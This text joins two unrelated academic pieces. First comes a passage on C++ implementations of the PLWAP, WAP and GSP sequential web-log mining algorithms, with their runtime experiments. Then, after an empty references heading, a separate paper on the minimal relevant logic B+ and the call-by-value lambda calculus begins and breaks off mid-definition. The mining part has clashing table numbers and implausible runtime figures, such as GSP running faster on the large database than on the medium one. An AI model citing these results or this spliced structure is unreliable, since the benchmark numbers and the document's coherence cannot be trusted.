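// Parse one line of the "test.data" format described above: UserID,
// sequence length, then the events, separated by whitespace (tabs or
// spaces). Returns {-1, {}} when the line is malformed or the length
// field does not match the number of events present.
std::pair<int, std::vector<int>> parseLine(const std::string& line) {
    std::istringstream in(line);
    int userId = 0, len = 0;
    if (!(in >> userId >> len) || len < 0) return {-1, {}};
    std::vector<int> events;
    int e = 0;
    while (static_cast<int>(events.size()) < len && in >> e)
        events.push_back(e);
    if (static_cast<int>(events.size()) != len) return {-1, {}};
    return {userId, events};
}
```

For the example line "100 5 10 20 40 10 30", this returns UserID 100 with the sequence 10, 20, 40, 10, 30.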
3. MINIMUM SUPPORT FORMAT: The program also needs to accept a value between 0 and 1 as minimum support. The minimum support input is entered interactively by the user during the execution of the program when prompted. For a minimum support of 50%, user should type 0.5, and for minsupport of 5%, user should type .05, and so on.
4. OUTPUT FILES AND FORMAT: result_PLWAP.data: Once the program terminates, we can find the result frequent patterns in a file named “result_PLWAP.data”. It may contain lines of patterns, each representing a frequent pattern.
5. FUNCTIONS USED IN THE CODE: (i) BuildTree: builds the PLWAP tree; (ii) buildLinkage: builds the pre-order linkage for the PLWAP tree; (iii) makeCode: makes the position code for a node; (iv) checkPosition: checks the position relationship between any two nodes in the PLWAP tree; (v) MiningProcess: mines sequential frequent patterns from the PLWAP tree using position codes.
6. DATA STRUCTURES: Three structs are used in this program: (i) the node struct represents a PLWAP node and contains: a. the event name, b. the number of occurrences of the event, c. a link to the position code, d. the length of the position code, e. the linkage to the next node with the same event name in the PLWAP tree, f. a pointer to its left son, g. a pointer to its right sibling, h. a pointer to its parent, i. the number of its sons; (ii) a position code struct, implemented as a linked list of unsigned integers to make it possible to handle data of any size without exceeding the maximum integer size; (iii) a linkage struct.
7. ADDITIONAL INFORMATION: The run time is displayed on the screen with start time, end time and total seconds for running the program.
3.2 C++ Implementation of the WAP Sequential Mining Algorithm
This is the WAP algorithm program based on the description in [17]: Jian Pei, Jiawei Han, Behzad Mortazavi-asl, and Hua Zhu, “Mining Access Patterns Efficiently from Web Logs”, PAKDD 2000.
1. DEVELOPMENT ENVIRONMENT: The same as described for PLWAP, and the program can run on any UNIX system as well: (i) Hardware: Intel Celeron 400 PC, 64M memory; (ii) Operating system: Windows 98; (iii) Development tool: Inprise (Borland) C++ Builder 6.0. The algorithm was developed under C++ Builder 6.0, and also compiles and runs under any standard C++ development tool.
2. INPUT FILES AND FORMAT:
i) Input file test.data: Pre-processed sequential input records
are read from the file “test.data”. The “test.data” file is composed of hundreds of thousands of lines of sequences where each line represents a web access sequence for each user.
Every line includes the UserID, the length of the sequence and the sequence itself, separated by tab spaces. For example, in the line 100 5 10 20 40 10 30, 100 represents the UserID, 5 is the length of the sequence, and the sequence is 10, 20, 40, 10, 30.
ii) Input file middle.data: used to save the conditional middle patterns. During the WAP tree mining process, following the linkages, once the sum of support for an event is found to be greater than the minimum support, all its prefix conditional patterns are saved in the "middle.data" file for the next round of mining. The format of "middle.data" is as follows: each line includes the length of the sequence, the occurrence count of the sequence, and the events in the sequence. For example, in the middle.data line 5 4 10 20 40 10 30, the length of the sequence is 5, 4 indicates that the sequence occurred 4 times in the previous conditional WAP tree, and the sequence is 10, 20, 40, 10, 30.
3. MINIMUM SUPPORT:
The program also needs to accept a value between 0 and 1 for minimum support. The user is prompted for minimum support when the program starts.
4. OUTPUT FILES AND FORMAT: result_WAP.data
Once the program terminates, the result patterns are in a file named “result_WAP.data”, which may contain lines of patterns.
5. FUNCTIONS USED IN THE CODE:
(i) BuildTree: builds the WAP tree / conditional WAP tree.
(ii) MiningProcess: produces sequential patterns / conditional prefix sub-patterns from the WAP tree / conditional WAP tree.
6. DATA STRUCTURES: Three structs are used in this program: (i) the node struct represents a WAP node and contains: a. the event name, b. the number of occurrences of the event, c. the linkage to the next node with the same event name in the WAP tree, d. a pointer to its left son, e. a pointer to its right sibling, f. a pointer to its parent;
(ii) a linkage struct described in the program.
7. ADDITIONAL INFORMATION: The run time is displayed on the screen with start time, end time and total seconds for running the program.
3.3 C++ Implementation of the GSP Sequential Mining Algorithm
This is a GSP algorithm implementation, which demonstrates the result described in [3]: R. Srikant and R. Agrawal. “Mining sequential patterns: Generalizations and performance improvements”, 1996.
1. DEVELOPMENT ENVIRONMENT: The same as described for PLWAP and runs in any UNIX system as well. (i) Hardware: Intel Celeron 400 PC, 64M Memory; (ii) Operating system: Windows 98; (iii) Development tool: Inprise/Borland C++ Builder 6.0. The algorithm is developed under C++ Builder 6.0 but also compiles and runs under any standard C++ development tools.
2. INPUT FILES AND FORMAT: Input file test.data: To simplify the input process of the program, we assume that all input data have been preprocessed such that all events belonging to the same user id have been gathered together, formed into a sequence and saved in "test.data". The "test.data" file is composed of hundreds of thousands of lines of sequences, where each line represents a web access sequence for one user. Every line includes the UserID, the length of the sequence and the sequence itself, separated by tab spaces. For example, in the line 100 5 10 20 40 10 30, 100 represents the UserID, the length of the sequence is 5, and the sequence is 10, 20, 40, 10, 30.
3. MINIMUM SUPPORT: The program also needs to accept a value between 0 and 1 as minimum support. The user is prompted for minimum support when the program starts.
4. OUTPUT FILES AND FORMAT: result_GSP.data
At the termination of the program, the result patterns are in a file named “result_GSP.data”, which may contain lines of frequent patterns.
5. FUNCTIONS USED IN THE CODE: (i)GSP: reads the file and mines levelwise according to the algorithm.
6. DATA STRUCTURES: There are structs for (i) the candidate sequence list with its counts and (ii) the sequence.
7. ADDITIONAL INFORMATION: The run time is displayed on the screen with start time, end time and total seconds for running the program.
4. PERFORMANCE AND EXPERIMENTAL ANALYSIS OF THREE ALGORITHMS
The PLWAP algorithm eliminates the need to store numerous intermediate WAP trees during mining, thus drastically cutting huge memory access costs. PLWAP annotates each tree node with a binary position code for quicker mining of the tree. This section compares the experimental performance of PLWAP with the WAP-tree mining and the Apriori-like GSP algorithms. The three algorithms were initially implemented in C++ running under the Inprise C++ Builder environment. All initial experiments were performed on a 400MHz Celeron PC with 64 megabytes of memory running Windows 98 (for the work in [7]). Current experiments are conducted with the same implementations of the programs, still on synthetic datasets generated using the resource data generator code from http://www.almaden.ibm.com/software/quest/Resources/index.shtml. This synthetic dataset has been used by most pattern mining studies [3, 12, 17]. Experiments were also run on real datasets generated from web log data of the University of Windsor Computer Science server and preprocessed with our web log cleaner code. The correctness of the implementations was confirmed by checking that the frequent patterns generated for the same dataset by all algorithms are the same. A high-speed UNIX Sun Microsystems machine with a total of 16384 MB of memory and 8 x 1200 MHz processors is used for these experiments. The synthetic datasets consist of sequences of events, where each event represents an accessed web page. The parameters shown below are used to generate the data sets.
| Parameter | Meaning |
|---|---|
| \|D\| | Number of sequences in the database |
| \|C\| | Average length of the sequences |
| \|S\| | Average length of maximal potentially frequent sequences |
| \|N\| | Number of events |
For example, C10.S5.N2000.D60K means that |C| = 10, |S| = 5, |N| = 2000, and |D| = 60K. It represents a dataset with an average sequence length of 10, an average length of maximal potentially frequent sequences of 5, 2000 individual events, and 60 thousand sequences in the database.
The execution times of the two algorithms are the same when there are nearly no frequent patterns found; in that case both are pegged at some constant values. Observations are made at three levels of small, medium and large database sizes (e.g., a small database may consist of a table with fewer than 40 thousand records, a medium-size table has between 50 and 200 thousand records, while a large one has over 300 thousand).
Experiment 1: Execution time trend with different minimum supports (small size database, 40K records):
This experiment uses a fixed-size database and different minimum supports to compare the performance of the PLWAP, WAP and GSP algorithms. The dataset is described as C2.5.S5.N50.D40K, and the algorithms are tested with minimum supports between 0.05% and 20% against the 40 thousand (40K) record database with 50 attributes and an average sequence length of 2.5. The results of this experiment are shown in Table 3 and Figure 5, with the number of frequent patterns found reported as Fp. At the minimum support of 0.05%, the number of frequent patterns found is highest (2729), and the PLWAP algorithm ran almost 3 times faster than the WAP algorithm. As the minimum support increases, the number of frequent patterns found decreases and the performance gain of PLWAP over WAP shrinks: the more frequent patterns a dataset contains, the higher the gain achieved by PLWAP. This is because the two algorithms spend about the same amount of time scanning the database and constructing the tree, but PLWAP saves on storing and reading the intermediate re-constructed trees, of which there are as many as frequent patterns found. The execution times of the two algorithms are the same when there are nearly no frequent patterns.
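The notion of minimum support driving all of these experiments can be sketched in code. The function below is our illustration, not the authors' implementation; it shows only the first mining step (finding frequent single events), with support measured as the fraction of sequences containing an event:

```python
def frequent_events(sequences, min_sup):
    """Return the events whose support meets min_sup (a fraction in [0, 1]).

    As in sequential pattern mining, each sequence contributes at most
    once to an event's support count, however often the event repeats
    inside it.  A sketch of the counting step shared by GSP, WAP and
    PLWAP, not any of the full algorithms.
    """
    n = len(sequences)
    counts = {}
    for seq in sequences:
        for event in set(seq):          # count each sequence once per event
            counts[event] = counts.get(event, 0) + 1
    return {e for e, c in counts.items() if c / n >= min_sup}
```

Raising `min_sup` shrinks the result set, which is exactly the trend the tables below trace: fewer frequent patterns, and a smaller gap between the algorithms.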
Experiment 2: Execution times trend with different minimum supports (Medium size database, 200K records):
This experiment uses a fixed-size database and different minimum supports to compare the performance of the PLWAP, WAP and GSP algorithms. The algorithms are tested with minimum supports between 0.05% and 15% against the 200 thousand (200K) record database with 50 attributes and an average sequence length of 2.5. The results of this experiment are shown in Table 4 and Figure 6, with the number of frequent patterns found reported as Fp. The trend in performance is the same as with the small database. When the minimum support reaches 15%, no frequent patterns are found and the running times of the two algorithms become the same.
Experiment 3: Execution Times for Dataset at Different Minimum Supports (large database):
This experiment uses a fixed-size database and different minimum supports to compare the performance of the PLWAP, WAP and GSP algorithms. The algorithms are tested with minimum supports between 0.05% and 15% against a one million (1M) record database. The results of this experiment are shown in Table 5 and Figure 7.
Experiment 3a: Execution Times for Dataset at Different Minimum Supports (large database but very low minimum supports):
This experiment uses a fixed-size database and different, very low minimum supports to compare the performance of the PLWAP and WAP algorithms.
### Table 4: Execution Times for Dataset at Different Minimum Supports (medium database)

<table>
<thead>
<tr>
<th>Alg</th>
<th>Runtime (in secs) at 0.05% support</th>
</tr>
</thead>
<tbody>
<tr>
<td>Fp=</td>
<td>34275</td>
</tr>
<tr>
<td>GSP</td>
<td>2630</td>
</tr>
<tr>
<td>WAP</td>
<td>1271</td>
</tr>
</tbody>
</table>
### Figure 7: Execution Times for Dataset at Different Minimum Supports (large database)
### Table 5: Execution Times for Dataset at Different Minimum Supports (large database)

<table>
<thead>
<tr>
<th>Alg</th>
<th>Runtime (in secs) at 0.05% support</th>
</tr>
</thead>
<tbody>
<tr>
<td>Fp=</td>
<td>63084</td>
</tr>
<tr>
<td>GSP</td>
<td>246</td>
</tr>
<tr>
<td>WAP</td>
<td>1296</td>
</tr>
</tbody>
</table>
### Table 6: Execution Times for Dataset at Different Minimum Supports (large database and low minsupp)

<table>
<thead>
<tr>
<th>Alg</th>
<th>Runtime (in secs) at 0.001% support</th>
</tr>
</thead>
<tbody>
<tr>
<td>Fp=</td>
<td>222K</td>
</tr>
<tr>
<td>WAP</td>
<td>13076</td>
</tr>
<tr>
<td>PLWAP</td>
<td>8183</td>
</tr>
</tbody>
</table>
### Figure 8: Execution Times for Dataset at Different Minimum Supports (large database and low minsupp)
### Experiment 4: Execution times trend with different database sizes (small size database, 2K to 14K):
This experiment uses a fixed minimum support and different database sizes to compare the performance of the PLWAP, WAP and GSP algorithms. The algorithms are tested on databases of sizes 2K to 14K at a minimum support of 1%. The gain in performance by the PLWAP algorithm is constant across the different sizes because the number of frequent patterns in the different-sized datasets produced by the data generator is about the same at a given minimum support. The results of this experiment are shown in Table 6 and Figure 8.
### Experiment 5: Execution times trend with different database sizes (medium size database, 20K to 200K):
This experiment uses a fixed minimum support and different database sizes to compare the performance of the PLWAP, WAP and GSP algorithms. The algorithms are tested on databases of sizes 20K to 200K at a minimum support of 1%. The results of this experiment are shown in Table 7 and Figure 9.
### Experiment 6: Execution times trend with different database sizes (large database, 300K to 1M):
This experiment uses a fixed minimum support and different database sizes to compare the performance of the PLWAP, WAP and GSP algorithms. The algorithms are tested on databases of sizes 300K to 1M at a minimum support of 1%. The results of this experiment are shown in Table 8 and Figure 10.
Figure 9: Execution Times Trend with Different Minimum Supports (large database)
Figure 10: Execution Times Trend with Different Database sizes (medium database)
### Experiment 7: Execution times trend with different database sizes (large database, 300K to 900K):
This experiment uses a fixed minimum support and different database sizes to compare the performance of the PLWAP, WAP and GSP algorithms. The algorithms are tested with database sizes between 300K and 900K records at a minimum support of 1%. The results of this experiment are shown in Table 9 and Figure 11.
Experiments were also run to check the behavior of the algorithms with varying sequence lengths and numbers of database attributes, and PLWAP always runs faster than the WAP algorithm when the average sequence length is less than 20 and some frequent patterns are found. However, PLWAP's performance starts to degrade when the average sequence length of the database is more than 20, because extremely long sequences produce nodes whose position codes exceed the maximum machine integer ("maxint"). In our current implementation, such a node's position code is stored across a number of linked variables, so managing and retrieving the position codes of excessively long sequences can become time consuming.
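To make the idea of position codes concrete, here is a small sketch of one prefix-based binary encoding. This scheme is an assumption for illustration, not necessarily the exact PLWAP encoding: the k-th child of a node receives its parent's code followed by k−1 zeros and a one, so that the ancestor test reduces to a proper-prefix check on bit strings:

```python
def assign_position_codes(tree, code="", out=None):
    """Assign binary position codes to a tree of {label: children} dicts.

    Sketch of one prefix-code scheme (our assumption, not necessarily
    the exact PLWAP encoding): the k-th child of a node gets the
    parent's code, then k-1 zeros, then a one.  Labels are assumed
    unique across the tree.
    """
    if out is None:
        out = {}
    for k, (label, children) in enumerate(tree.items()):
        child_code = code + "0" * k + "1"   # k = 0 for the leftmost child
        out[label] = child_code
        assign_position_codes(children, child_code, out)
    return out


def is_ancestor(code_a, code_b):
    """With this scheme, a node is an ancestor of another iff its code
    is a proper prefix of the other's code."""
    return code_b.startswith(code_a) and code_a != code_b
```

Each tree level adds at least one bit, so codes for very deep trees outgrow a single machine word and must be spread over several linked variables, which is the overhead described above.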
5. CONCLUSIONS
This paper discusses the source code implementation of the PLWAP algorithm presented in [7], as well as our implementations of two other sequential mining algorithms, WAP [17] and GSP [3], with which PLWAP was compared. Extensive experimental studies were conducted on the three implemented algorithms using IBM quest synthetic datasets. The experiments show that the PLWAP algorithm, which mines a pre-order linked, position-coded version of the WAP tree, always outperforms the other two algorithms. PLWAP improves on the performance of the efficient tree-based WAP algorithm by mining with position codes and their suffix-tree root sets, rather than recursively storing intermediate WAP trees. Thus, it saves on
Table 8: Execution Times for Different Database Sizes at Minsupport (medium database)

<table>
<thead>
<tr>
<th>Alg</th>
<th>Runtime (in secs) at database size 20K</th>
</tr>
</thead>
<tbody>
<tr>
<td>GSP</td>
<td>306</td>
</tr>
<tr>
<td>WAP</td>
<td>7</td>
</tr>
<tr>
<td>PLWAP</td>
<td>3</td>
</tr>
</tbody>
</table>
Figure 11: Execution Times Trend with Different Database sizes (large database)
Table 9: Execution Times for Different Database Sizes at Minsupport (large database)

<table>
<thead>
<tr>
<th>Alg</th>
<th>Runtime (in secs) at database size 300K</th>
</tr>
</thead>
<tbody>
<tr>
<td>GSP</td>
<td>5329</td>
</tr>
<tr>
<td>WAP</td>
<td>22</td>
</tr>
<tr>
<td>PLWAP</td>
<td>12</td>
</tr>
</tbody>
</table>
processing time, and more so when the number of frequent patterns increases and the minimum support threshold is low. The PLWAP algorithm runs faster than the WAP algorithm even on very large databases. PLWAP's performance degrades somewhat on very long sequences (average sequence length above 20) because of the growth in the size of the position codes it must build and process, which leads to a very deep PLWAP tree. The experiments show that mining web logs with the PLWAP algorithm is much more efficient than with the WAP-tree and GSP algorithms. For mining sequential patterns from web logs, the following aspects may be considered for future work. The PLWAP algorithm could be extended to handle sequential pattern mining in large traditional databases and concurrency of events. Efficient web usage mining could also benefit from relating usage to the content of web pages. Other areas of interest include distributed mining with the PLWAP tree and applying these techniques to incremental mining of web logs and sequential patterns.
6. ACKNOWLEDGMENTS
This research was supported by the Natural Science and Engineering Research Council (NSERC) of Canada under an operating grant (OGP-0194134) and a University of Windsor grant.
7. REFERENCES
The Minimal Relevant Logic and the Call-by-Value Lambda Calculus*
S. van Bakel, M. Dezani-Ciancaglini, U. de’Liguoro, Y. Motohama
Department of Computing, Imperial College London, UK
Dipartimento di Informatica, Università degli Studi di Torino, Italy
Abstract
The minimal relevant logic $B^+$, seen as a type discipline, includes an extension of Curry types known as the intersection type discipline. We will show that the full logic $B^+$ gives a type assignment system which produces a model of Plotkin’s call-by-value $\lambda$-calculus.
1 Introduction
The logical system $B^+$ arose from Meyer and Routley’s investigation on the negation-free entailment logic [12]. In their approach, $B^+$ turns out as the minimal relevant logic, which is complete with respect to a variant of Kripke models, called the positive model structures.
Independently, and with quite different aims, an extension of the Curry type assignment system with “intersection” types was introduced in [3] by Coppo and Dezani. The same authors, together with Barendregt, were able to prove in [2] that, provided a suitable axiomatisation of the subtype relation $A \leq B$, the set of filters over types is a $\lambda$-model. As a consequence, a completeness theorem for the intersection types assignment system was established.
As remarked by Meyer in [8], it can be recognised that $A \leq B$ holds in the type theory of [2] if and only if, “on translation”, $A \rightarrow B$ is a theorem of $B^+$. However, the language of $B^+$ has one more connective than intersection types, namely disjunction. Extensions of the intersection type discipline with a “union” type constructor have been pursued, by some of the present authors together with others, both in the framework of classical $\lambda$-calculus and in that of some “parallel” and non-deterministic extensions of $\lambda$-calculus: see [1, 5, 4]. From these investigations it turns out that strong systems of union types do not give filter $\lambda$-models, while weaker systems allow for a satisfactory logical analysis of some extended $\lambda$-calculi.
Here we will follow a different path. Instead of extending the calculus, we will consider Plotkin’s call-by-value $\lambda$-calculus [9], whose syntax is the same as that of the $\lambda K$-calculus, but the $\beta$-rule is replaced by a restricted form:
\[ \beta_v \quad (\lambda x.M)N \rightarrow M[N/x], \quad \text{if } N \text{ is not an application.} \]
The idea is that a term that is an application needs to be further evaluated before it can be passed on as an argument. By rule $(\beta_v)$, in contrast to the classical $\beta$-rule, substitution is delayed until the evaluation of the argument $N$ reaches a value, namely either a variable or an abstraction. Because of this, the call-by-value $\lambda$-calculus has been proposed and studied as the abstract counterpart of call-by-value lazy programming languages, reflecting closer
---
* Partially supported by NATO Collaborative Research Grant CRG 970285 ‘Extended Rewriting and Types’.
the actual practice of language implementation. In fact, the subtleties of parameter passing
can be caught by the formal calculus, and analyzed using both proof theoretical and model
theoretical tools in an elegant way [6, 10, 11].
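A standard example, spelled out here for concreteness, shows the difference between the two rules. Let \( \Omega \equiv (\lambda x.xx)(\lambda x.xx) \). Under the classical \( \beta \)-rule,

\[ (\lambda xy.y)\,\Omega \rightarrow_\beta \lambda y.y, \]

discarding the divergent argument. Under \( (\beta_v) \) this redex can never fire: \( \Omega \) is an application, and its only \( \beta_v \)-reduct is \( \Omega \) itself (the argument \( \lambda x.xx \) is a value), so the argument never reaches a value and \( (\lambda xy.y)\,\Omega \) diverges as well.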
What we will show here is that \( \mathcal{B}^+ \) is the type theory of the call-by-value \( \lambda \)-calculus, in the
following sense: we will consider the full language of the logic \( \mathcal{B}^+ \), including disjunction,
and take the \( \mathcal{B}^+ \) axioms and rules as defining a subtype relation. Then we will consider a
type assignment system which is essentially that of [2], but using the extended type syntax
and subtyping relation hinted above, with a key restriction on the types that can be assumed
for variables in a basis. It turns out that, within this system, types are preserved under
\( \beta\nu \)-conversion. Moreover, the filter structure of the type theory is an instance of call-by-value
syntactical \( \lambda \)-model (a generalisation [6, 10, 11] of the notion of syntactical \( \lambda \)-model due to
Hindley and Longo [7]).
2 The minimal relevant logic \( \mathcal{B}^+ \) as a type discipline
The minimal relevant logic \( \mathcal{B}^+ \) is a propositional calculus. To see \( \mathcal{B}^+ \) as a type discipline,
we interpret propositions as types: the constant for truth is interpreted as a constant type \( \nu \),
whose intended meaning is “the type of values”; implication as the arrow type connective \( \to \),
conjunction and disjunction as intersection (\( \land \)) and union type connectives (\( \lor \)), respectively.
Then we define a preorder relation \( \leq \) such that \( A \leq B \) if and only if \( A \to B \) is a theorem of
\( \mathcal{B}^+ \).
Definition 2.1 (The set \( L \) of formulae) The set \( L \) of formulae is defined by
i) a denumerable set \( \mathcal{P}V \) of propositional variables, ranged over by \( a,b,c \), possibly with
subscripts;
ii) \( \nu \in L \) (a type constant);
iii) \( A,B \in L \Rightarrow (A \to B),(A \land B),(A \lor B) \in L \).
Notation. To avoid using too many parentheses, we assume that \( \land \) and \( \lor \) take precedence
over \( \to \), and that \( \to \) associates to the right.
Definition 2.2 (The minimal relevant logic \( \mathcal{B}^+ \) with \( \leq \)) \( \mathcal{B}^+ \) is the logic on the language \( L \)
defined by the following axioms and rules:
\[
\begin{align*}
(A1) & : A \leq \nu \\
(A2) & : A \leq A \\
(A3) & : A \leq A \land A \\
(A4) & : A \land B \leq A, A \land B \leq B \\
(A5) & : A \lor A \leq A \\
(A6) & : A \leq A \lor B, B \leq A \lor B \\
(A7) & : (A \to B) \land (A \to C) \leq A \to B \land C \\
(A8) & : (A \to C) \land (B \to C) \leq A \lor B \to C \\
(A9) & : A \land (B \lor C) \leq (A \land B) \lor (A \land C) \\
(R1) & : A \leq B, B \leq C \Rightarrow A \leq C \text{ (transitivity)} \\
(R2) & : A \leq B, C \leq D \Rightarrow A \land C \leq B \land D \text{ (\( \land \)-monotonicity)} \\
(R3) & : A \leq B, C \leq D \Rightarrow A \lor C \leq B \lor D \text{ (\( \lor \)-monotonicity)} \\
(R4) & : A \leq B \Rightarrow B \to C \leq A \to C \text{ (suffixing)} \\
(R5) & : B \leq C \Rightarrow A \to B \leq A \to C \text{ (prefixing)}.
\end{align*}
\]
We define \( \sim \) as the equivalence relation induced by \( \leq \): \( A \sim B \) if and only if \( A \leq B \) and \( B \leq A \). The relation \( \sim \) enjoys the following properties:
i) \( \sim \) is a congruence relation.
ii) \( A \land B \sim B \land A, \ A \lor B \sim B \lor A. \)
iii) \( (A \land B) \land C \sim A \land (B \land C), \ (A \lor B) \lor C \sim A \lor (B \lor C). \)
iv) \( A \land (B \lor C) \sim (A \land B) \lor (A \land C), \ A \lor (B \land C) \sim (A \lor B) \land (A \lor C) \) (distributivity).
v) \( (A \rightarrow B) \land (A \rightarrow C) \sim (A \rightarrow B \land C). \)
vi) \( (A \rightarrow C) \land (B \rightarrow C) \sim (A \lor B \rightarrow C). \)
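As a sample derivation (spelled out by us for concreteness), property (vi) follows from the axioms and rules:

\[
\begin{align*}
(A \rightarrow C) \land (B \rightarrow C) &\leq A \lor B \rightarrow C && \text{by (A8);} \\
A \lor B \rightarrow C &\leq A \rightarrow C && \text{by (A6) and suffixing (R4);} \\
A \lor B \rightarrow C &\leq B \rightarrow C && \text{likewise;} \\
A \lor B \rightarrow C &\leq (A \rightarrow C) \land (B \rightarrow C) && \text{by (A3), (R2) and (R1).}
\end{align*}
\]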
To further investigate properties of the system \( B^+ \), it is useful to associate to each type both its conjunctive and disjunctive normal form. First let us define inductively the following subsets of \( L \).
**Definition 2.3 (Stratification of \( L \))** \( T_\rightarrow, T_\lor, T_\land, T_\land\lor, T_\lor\land \subseteq L \) are inductively defined:
\[(T_\rightarrow): \ v \in T_\rightarrow; \ a \in T_\rightarrow, \ for \ all \ propositional \ variables \ a \]
\( A \in T_\land, B \in T_\lor \Rightarrow A \rightarrow B \in T_\rightarrow \)
\( (T_\lor): \ A \in T_\rightarrow \Rightarrow A \in T_\lor \)
\( A, B \in T_\lor \Rightarrow A \lor B \in T_\lor \)
\( (T_\land): \ A \in T_\rightarrow \Rightarrow A \in T_\land \)
\( A, B \in T_\land \Rightarrow A \land B \in T_\land \)
\( (T_\land\lor): \ A \in T_\lor \Rightarrow A \in T_\land\lor \)
\( A, B \in T_\land\lor \Rightarrow A \land B \in T_\land\lor \)
\( (T_\lor\land): \ A \in T_\land \Rightarrow A \in T_\lor\land \)
\( A, B \in T_\lor\land \Rightarrow A \lor B \in T_\lor\land. \)
We will now introduce maps from arbitrary types belonging to \( L \) into their conjunctive/disjunctive normal forms in \( T_\land\lor \) and \( T_\lor\land \), respectively.
**Definition 2.4** The maps \( m_{\land\lor}: L \rightarrow T_{\land\lor} \) and \( m_{\lor\land}: L \rightarrow T_{\lor\land} \) are defined as follows, by simultaneous induction on the structure of formulæ:
i) \( m_{\land\lor}(A) = m_{\lor\land}(A) = A \) if \( A \in \mathcal{P}V \cup \{v\} \).
ii) If \( m_{\lor\land}(A) = \bigvee_{i \in I} A_i \) (where each \( A_i \in T_\land \)) and \( m_{\land\lor}(B) = \bigwedge_{j \in J} B_j \) (where each \( B_j \in T_\lor \)) then
\[
m_{\land\lor}(A \rightarrow B) = m_{\lor\land}(A \rightarrow B) = \bigwedge_{i \in I} \bigwedge_{j \in J} (A_i \rightarrow B_j).
\]
iii) \( m_{\land\lor}(A \land B) = m_{\land\lor}(A) \land m_{\land\lor}(B) \), and, if \( m_{\lor\land}(A) = \bigvee_{i \in I} A_i \) and \( m_{\lor\land}(B) = \bigvee_{j \in J} B_j \) then
\[
m_{\lor\land}(A \land B) = \bigvee_{i \in I} \bigvee_{j \in J} (A_i \land B_j).
\]
iv) \( m_{\lor\land}(A \lor B) = m_{\lor\land}(A) \lor m_{\lor\land}(B) \), and, if \( m_{\land\lor}(A) = \bigwedge_{i \in I} A_i \) and \( m_{\land\lor}(B) = \bigwedge_{j \in J} B_j \) then
\[
m_{\land\lor}(A \lor B) = \bigwedge_{i \in I} \bigwedge_{j \in J} (A_i \lor B_j).
\]
We shall prove, in the Appendix, that \( A \sim m_{\land\lor}(A) \sim m_{\lor\land}(A) \) for all \( A \).
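The two maps can also be rendered executably. The sketch below is ours (the representation is an assumption, not from the paper): a formula is `'v'`, a variable name, or a tuple `('->', A, B)`, `('and', A, B)` or `('or', A, B)`; a conjunctive normal form is a list of clauses (disjunctions) and a disjunctive normal form a list of terms (conjunctions), each containing \( T_\rightarrow \) atoms:

```python
def cnf(A):
    """m_{and-or}: a conjunction (list) of clauses, each a disjunction (list)."""
    if isinstance(A, str):                  # 'v' or a propositional variable
        return [[A]]
    op, B, C = A
    if op == '->':
        # Arrow case: pair every DNF term of the antecedent with every
        # CNF clause of the consequent; each pair is a T_arrow atom.
        atoms = [('->', tuple(t), tuple(c)) for t in dnf(B) for c in cnf(C)]
        return [[a] for a in atoms]
    if op == 'and':
        return cnf(B) + cnf(C)
    return [b + c for b in cnf(B) for c in cnf(C)]   # 'or': distribute


def dnf(A):
    """m_{or-and}: a disjunction (list) of terms, each a conjunction (list)."""
    if isinstance(A, str):
        return [[A]]
    op, B, C = A
    if op == '->':
        atoms = [('->', tuple(t), tuple(c)) for t in dnf(B) for c in cnf(C)]
        return [atoms]                       # a single conjunctive term
    if op == 'or':
        return dnf(B) + dnf(C)
    return [b + c for b in dnf(B) for c in dnf(C)]   # 'and': distribute
```

For instance, `cnf(('->', ('or', 'a', 'b'), 'c'))` yields the two clauses for \( (a \rightarrow c) \land (b \rightarrow c) \), mirroring property (vi).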
The Lindenbaum algebra of \( B^+ \), i.e. the quotient of \( L \) under \( \sim \), is ordered by the relation \([A]_\sim \leq [B]_\sim \iff A \leq B \) (where \([A]_\sim \) is the equivalence class of \( A \)). As an ordered set it is a distributive lattice, where \([A \land B]_\sim \) and \([A \lor B]_\sim \) are respectively the meet and the join of \([A]_\sim \) and \([B]_\sim \), and \([v]_\sim \) is the top.
Co-prime elements in a lattice, here called \( \lor \)-prime elements, play a role in the representation theorems of distributive lattices. In our setting, \( \lor \)-prime formulæ will turn out to be the types of closed terms that are \( \beta_v \)-convertible to values. We introduce them here and defer the analysis of their connection to values to the next sections.
Definition 2.5 A formula A is $\lor$-prime iff $A \leq B \lor C \Rightarrow A \leq B$ or $A \leq C$.
Theorem 2.6 (Properties of $\lor$-prime formulas)
i) $\nu$ and any propositional variable are $\lor$-prime.
ii) If $m_{\lor}(A) = \lor_{i \in I} A_i$ then $A_i$ is $\lor$-prime, for all $i \in I$.
iii) The formula $\land_{i \in I} (A_i \rightarrow B_i)$ is $\lor$-prime for all (finite) $I$ and formulas $A_i, B_i$.
iv) $B \rightarrow C \not\sim \nu$ for all $B, C$.
v) $\land_{i \in I} (A_i \rightarrow B_i) \leq C \rightarrow D$ and $C$ is $\lor$-prime imply $C \leq \land_{j \in J} A_j$ and $\land_{j \in J} B_j \leq D$ for some $J \subseteq I$.
The proof of Theorem 2.6 is reported in the Appendix. The condition ‘$C$ is $\lor$-prime’ in statement (v) of the above theorem, is necessary. A counter-example is axiom (A8).
3 The type assignment system
Type assignment systems are formal systems deriving statements of the form $M : A$, where $M$ (the subject) is a pure $\lambda$-term and $A$ (the predicate) is a type (here a formula). The intuitive meaning is that types are properties of terms, hence $M : A$ means “$M$ has property $A$”. As $M$ may contain free variables, assumptions about the types of such variables may be used in the derivation, and are collected into bases (also called contexts): $x_1 : A_1, \ldots, x_n : A_n$, which we consider as finite sets of statements (assumptions) such that $x_i \not\equiv x_j$ if $i \neq j$.
Bases are ranged over by $\Gamma$, and we write $\Gamma, x : A$ as abbreviation of $\Gamma \cup \{x : A\}$, under the assumption that $x$ does not occur in $\Gamma$. Then the general form of statements derivable in a type assignment system is $\Gamma \vdash M : A$, meaning “$M$ has type $A$ if the variables in $\Gamma$ have the types listed in $\Gamma$ itself”.
We observe that, although the basic motivation for having bases is to handle the types of the free variables in the subject $M$, it is not the case that, if $\Gamma \vdash M : A$ is derivable, then the subjects of statements in $\Gamma$ are exactly the free variables of $M$. Indeed, on the one hand $\Gamma$ may contain assumptions about variables not occurring free in $M$; on the other hand, because of rule (v), $M$ may contain free variables which are not in $\Gamma$.
Definition 3.1 (The type assignment system)
i) A statement is an expression of the form $M : A$, where $M$ is a term (subject) and $A$ is a type (predicate).
ii) An assumption is a statement whose subject is a term variable.
iii) A basis is a set of assumptions with distinct variables as subjects whose predicates are $\lor$-prime types.
iv) A statement $M : A$ is derivable from a basis $\Gamma$, notation $\Gamma \vdash M : A$, if $\Gamma \vdash M : A$ can be proved using the following axioms and inference rules:
